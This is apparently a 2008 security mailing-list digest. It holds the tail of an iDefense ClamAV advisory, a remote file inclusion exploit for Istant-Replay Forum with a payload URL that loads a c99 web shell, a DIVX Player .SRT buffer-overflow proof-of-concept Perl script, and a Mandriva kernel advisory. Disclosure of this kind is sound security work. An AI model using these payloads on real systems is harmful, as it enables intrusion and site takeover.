Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the process using libclamav. In the case of
the clamd program, this will result in code execution with the
privileges of the clamav user. Unsuccessful exploitation results in the
clamd process crashing.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in ClamAV
0.92.1. Previous versions may also be affected.
V. WORKAROUND
Disabling the scanning of PE files will prevent exploitation.
If using clamscan, this can be done by running clamscan with the
'--no-pe' option.
If using clamdscan, set the 'ScanPE' option in the clamd.conf file to
'no'.
VI. VENDOR RESPONSE
VII. CVE INFORMATION
A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.
VIII. DISCLOSURE TIMELINE
03/04/2008 Initial vendor notification
03/06/2008 Initial vendor response
04/14/2008 Coordinated public disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Damian Put and Thomas
Pollet.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2008 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
remote file include
# Istant-Replay Forum Remote File Inclusion Vulnerability # ## AUTHOR: THuGM4N ## Email : [EMAIL PROTECTED] ## Script : Istant-Replay Forum ## Site : http://www.chattaitaliano.com ## Vulnerable CODE : ~~/read.php ~~ $a = $_GET['data']; $b = $_GET['post']; $foo = include $a.txt; ~~~ ## BUT THE EXPLOIT IS LIKE THAT : http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt? ## BIGUP 2 All Attackers Around The World . # Istant-Replay Forum Remote File Inclusion Vulnerability #
DIVX Player = 6.7.0 Buffer Overflow PoC ( .SRT )
# DIVX Player = 6.7.0 Buffer Overflow PoC ( .SRT ) # Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritted # Replace MOVIE_FILENAME by your movie filename ( .avi ) # #!/usr/local/bin/perl my $file=MOVIE_FILENAME.srt; my $payload = A x 4096; open( $file, $file) or die Cannot open $file: $!; print $file 1 \n; print $file 00:00:01,001 -- 00:00:02,001\n; print $file $payload; close($file); print $file has been created \n;
[ MDVSA-2008:086 ] - Updated kernel packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:086 http://www.mandriva.com/security/ ___ Package : kernel Date: April 15, 2008 Affected: Corporate 4.0 ___ Problem Description: The isdn_ioctl function in isdn_common.c in the Linux kernel prior to 2.6.23 allows local users to cause a denial of service via a crafted ioctl struct in which iocts is not null terminated, which trigger a buffer overflow (CVE-2007-6151). The do_corefump function in fs/exec.c in the Linux kernel prior to 2.6.24-rc3 did not change the UID of a core dump file if it exists before a root process creates a core dump in the same location, which could possibly allow local users to obtain sensitive information (CVE-2007-6206). The shmem_getpage function in mm/shmem.c in the Linux kernel versions 2.6.11 through 2.6.23 did not properly clear allocated memory in certain rare circumstances related to tmps, which could possibly allow local users to read sensitive kernel data or cause a crash (CVE-2007-6417). Additionally, this kernel provides a fix for megaraid_sas and updates it to version 3.13, updates mptsas to version 3.12.19, and updates e1000-ng to version 7.6.12, as well as adds igb version 1.0.8. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6151 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6417 ___ Updated Packages: Corporate 4.0: 4ecd928352ae1a0e37af030841e1daca corporate/4.0/i586/kernel-2.6.12.34mdk-1-1mdk.i586.rpm e25d7be22e3e194dd1f50409d0e71b90 corporate/4.0/i586/kernel-BOOT-2.6.12.34mdk-1-1mdk.i586.rpm e42a62385fd608bf8d9b3ec62d6684e8 corporate/4.0/i586/kernel-doc-2.6.12.34mdk-1-1mdk.i586.rpm 0522dc2efc14a6fb456bed196e5ef87e corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.34mdk-1-1mdk.i586.rpm 723df91e8a94e9e4654a30875fe9de94 corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.34mdk-1-1mdk.i586.rpm b276ba8700f7e611bfdf02b3b26c4796 corporate/4.0/i586/kernel-smp-2.6.12.34mdk-1-1mdk.i586.rpm 0a369c5c6e085596c2fa579074e0eed0 corporate/4.0/i586/kernel-source-2.6.12.34mdk-1-1mdk.i586.rpm 53e34bb761dbf927ec911248aee1f23b corporate/4.0/i586/kernel-source-stripped-2.6.12.34mdk-1-1mdk.i586.rpm c10f59cf9d289f0e9e8cdeb4e7fb3f0e corporate/4.0/i586/kernel-xbox-2.6.12.34mdk-1-1mdk.i586.rpm 90a86dd0e5fb9d62edd9682f5a86f978 corporate/4.0/i586/kernel-xen0-2.6.12.34mdk-1-1mdk.i586.rpm af3beaab8bf06f0beef21158e5d6878e corporate/4.0/i586/kernel-xenU-2.6.12.34mdk-1-1mdk.i586.rpm 5137cdde7b33a50562d783ee93bfa608 corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm Corporate 4.0/X86_64: 371f8a2b038bbe058dea1666b3b186da corporate/4.0/x86_64/kernel-2.6.12.34mdk-1-1mdk.x86_64.rpm c7c9bfe79048fb2f94ca600ddd2da911 corporate/4.0/x86_64/kernel-BOOT-2.6.12.34mdk-1-1mdk.x86_64.rpm a27a0da5b9e28ce0193a83a75e6e73c8 corporate/4.0/x86_64/kernel-doc-2.6.12.34mdk-1-1mdk.x86_64.rpm 7615a2c0aee3363886f159f4bfc5f538 corporate/4.0/x86_64/kernel-smp-2.6.12.34mdk-1-1mdk.x86_64.rpm 0e896d19f066f836fcfb7dd470522d0c corporate/4.0/x86_64/kernel-source-2.6.12.34mdk-1-1mdk.x86_64.rpm b09194d6e8a07b1ae836be6335808464 corporate/4.0/x86_64/kernel-source-stripped-2.6.12.34mdk-1-1mdk.x86_64.rpm 6845355d4579b2f2933935c88567981b corporate/4.0/x86_64/kernel-xen0-2.6.12.34mdk-1-1mdk.x86_64.rpm f0e8c8777c6da9db4dbea6de1b0fc920 corporate/4.0/x86_64/kernel-xenU-2.6.12.34mdk-1-1mdk.x86_64.rpm 5137cdde7b33a50562d783ee93bfa608 corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux)
